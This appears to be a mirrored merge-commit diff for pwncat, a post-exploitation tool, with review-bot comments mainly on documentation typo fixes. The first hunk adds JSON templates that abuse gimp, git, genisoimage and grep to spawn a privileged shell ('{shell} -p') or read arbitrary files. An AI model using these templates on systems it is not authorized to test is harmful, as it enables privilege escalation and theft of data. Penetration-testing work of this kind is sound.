mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-12-11 17:34:19 +01:00
Merge branch 'master' of github.com:calebstewart/pwncat
This commit is contained in:
commit
94ea7ea969
@ -800,6 +800,64 @@
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
}
],
//-------------------------------------------------------------------
"genisoimage": [
{
"type": "read",
"stream" : "print",
"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
"args": []
}
],
//-------------------------------------------------------------------
"gimp": [
{
"type": "shell",
"payload": "{command}",
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
"exit": "exit"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
}

// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
// Since it can get a shell, this is not really an issue.
// {
// "type": "write",
// "stream":"raw",
// "payload": "{command} 2>/dev/null",
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
// },
// {
// "type": "write",
// "stream":"base64",
// "payload": "{command} 2>/dev/null",
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
// }
],
//-------------------------------------------------------------------
"git": [
{
"type": "shell",
"payload": "{command}",
"args": ["help", "config"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
//-------------------------------------------------------------------
"grep": [
{
"type": "read",
"stream":"print",
"payload": "{command}",
"args": ["''", "{lfile}"]
}
],



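Review bot: `{lfile}` is substituted unquoted into the `genisoimage` payload (`{command} -q -o - {lfile} | ...`) and into the `grep` args (`["''", "{lfile}"]`), and in both `gimp` techniques it lands inside a double-quoted Python literal (`open(\"{lfile}\",\"rb\")`), so a path containing whitespace, a quote or another shell metacharacter breaks the command or changes what it does; the templating layer should shell-quote the path for the payload/args cases and escape it for the Python literal rather than trusting the path to be well-behaved. The fixed `{tail} -c +49152` offset encodes an assumption about where genisoimage places a single file's data in the image; a comment stating that assumption, and whether the caller must trim whatever follows the file's data in the image, would save the next reader from reverse-engineering the number. The two commented-out `write` blocks plus the note on why they fail are dead data in a config file; keep the two-line explanation and drop the blocks, or move both to a tracked issue. Minor: `"stream" : "print"` differs in spacing from `"stream": "raw"` and `"stream":"print"` in the same hunk, and the hunk ends with several added blank lines after the `grep` entry.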
@ -3,7 +3,7 @@ API Documentation

``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
with the remote host. A large variety of interaction with the remote host has been abstracted to
make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
prompt commands or more complicated privilege escalation or persistence methods.

.. toctree::
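Review bot: the sentence this hunk corrects continues onto the next context line with `both for implementing simple ``pwncat`` prompt commands or more complicated ...`; `both ... or` should be `both ... and`. While the paragraph is being touched, `A large variety of interaction with the remote host has been abstracted` reads more cleanly as `Much of the interaction with the remote host has been abstracted`.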
@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
Methods vs Techniques
---------------------

Privelege escalation methods may implement multiple techniques. Techniques represent a single action
Privilege escalation methods may implement multiple techniques. Techniques represent a single action
which a specific privilege escalation method can perform. Each technique is identified by it's method,
the user which the action can be performed as, a Capability and some method specific data.

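Review bot: the context line right after the fix still has `identified by it's method`, which should be the possessive `its method`, and `method specific data` on the following line wants a hyphen (`method-specific data`). Both are in the same paragraph as the `Privilege` fix and belong in this commit.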
@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
up until the end delimeter.

The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
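Review bot: `delimeters` / `delimeter` is misspelled three times in the context lines around the fix (`prepend and append delimeters`, `the starting delimeter`, `the end delimeter`); it should be `delimiters` / `delimiter`. The hunk header's `processes output` should also be `process's output`. Since this hunk already rewrites one line of the paragraph, fixing these here avoids a follow-up typo commit.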
@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
import os
import shutil

with open("loca-file", "rb") as src:
with open("local-file", "rb") as src:
with pwncat.victim.open("/tmp/remote-file", "wb",
length=os.path.getsize("local-file")) as dst:
shutil.copyfileobj(src, dst)
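Review bot: the typo this hunk fixes was possible because the local filename is written out twice, in `open("local-file", "rb")` and again in `os.path.getsize("local-file")`; binding it once (for example `local = "local-file"`) and using the variable in both places keeps the two from drifting apart again. A sentence in the surrounding text explaining why `length=` is passed to `pwncat.victim.open` would also help readers who copy this snippet for their own uploads.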
@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
yielding each abstracted service object. Each object contains a name, description, and state as well as
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
on you having the correct permission to manage the services, however retrieve the state and list of
on you having the correct permission to manage the services, however retrieving the state and list of
services should work regardless of your permission level.

.. code-block:: python
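Review bot: the corrected line still joins two independent clauses with a comma (`... manage the services, however retrieving the state ...`); split it into `... manage the services. However, retrieving the state and list of services should work ...` or use a semicolon. `obviously` on the line above can go; the permission requirement is the point worth stating, not its obviousness.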
@ -122,7 +122,7 @@ services should work regardless of your permission level.
print(f"{service.name} is {'running' if service.running else 'stopped'}")

To find a specific service by name, there is a ``find_service`` method which returns an individual
remote service object. If the service is not found, a ValueError is raised.
remote service object. If the service is not found, a ``ValueError`` is raised.

.. code-block:: python

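Review bot: the markup fix is correct; since the text now documents that ``find_service`` raises ``ValueError`` for an unknown name, the ``.. code-block:: python`` that follows should show the lookup wrapped in ``try`` / ``except ValueError`` so readers copying the example handle the documented failure instead of letting it propagate.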
@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:

.. code-block:: bash

set -p bob "b0b5_P@ss0rd"
set -p bob "b0b5_P@ssw0rd"

Key Bindings
------------

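Review bot: the corrected example still shows a realistic-looking password literal; documentation examples get copied verbatim, so an obviously fake placeholder such as `set -p bob "<password>"` is the safer choice. The surrounding text should also say that a password passed as a command-line argument ends up in the shell's history and is visible in process listings, and, if `set` can prompt for the value instead, point readers to that.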
@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
on the remote host and provide you with raw terminal access.

pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
programatically interact with the remote host alongside your terminal access.
programmatically interact with the remote host alongside your terminal access.
pwncat provides you with a local shell interface which can utilize your
connection for enumeration, file upload/download, automatic persistence
installation and even automated privilege escalation.
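Review bot: the fixed line ends with `alongside your terminal access`, repeating `raw terminal access` from the sentence before it; `alongside your interactive session` avoids the echo. `which can utilize your connection` on the next line reads better as `which can use your connection`.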
@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
# You now have a full terminal that doesn't exit on C-c
remote$

This works well. However, the added steps to get a reverse shell are laberous
This works well. However, the added steps to get a reverse shell are laborious
after a while. Also, the danger of losing your remote shell by accidentally
pressing "C-c" prior to gaining raw access is high. This was the original
inspiration of this project.

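Review bot: `the original inspiration of this project` on the last context line should be `inspiration for this project`. The corrected sentence says the steps are `to get a reverse shell`, but the transcript above (ending at `remote$` with `a full terminal that doesn't exit on C-c`) shows steps that turn an existing reverse shell into a usable terminal; `the added steps to upgrade a reverse shell` would match the example.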
@ -5,7 +5,7 @@ Installation
:maxdepth: -1

The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:

.. code-block:: bash

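Review bot: the changed line still reads `your distributions Python Development package`, which needs the possessive `distribution's` and lower-case `Python development package`; the line above it names two items (`is ``python3`` and ``pip```), so `The only system dependencies for ``pwncat`` are ...`. Both sit inside this hunk and could be fixed with it.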
@ -502,7 +502,7 @@ class Victim:
:return: The full path to the requested binary or None if it was not found.
"""

if self.has_busybox:
if self.host.busybox is not None:
if name in self.busybox_provides:
if quote:
return f"{shlex.quote(str(self.busybox_path))} {name}"

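Review bot: the guard now tests `self.host.busybox is not None`, but the return two lines below still builds the path from `self.busybox_path`; if those are distinct attributes the check can pass while `busybox_path` is unset or stale, so either test `self.busybox_path` directly or derive `busybox_path` from `self.host.busybox` as a property so there is one source of truth. Quoting the path with `shlex.quote` is right; `name` is interpolated unquoted into the same f-string, which is fine only as long as callers pass bare binary names, and a one-line comment stating that contract would prevent a future caller from passing something richer.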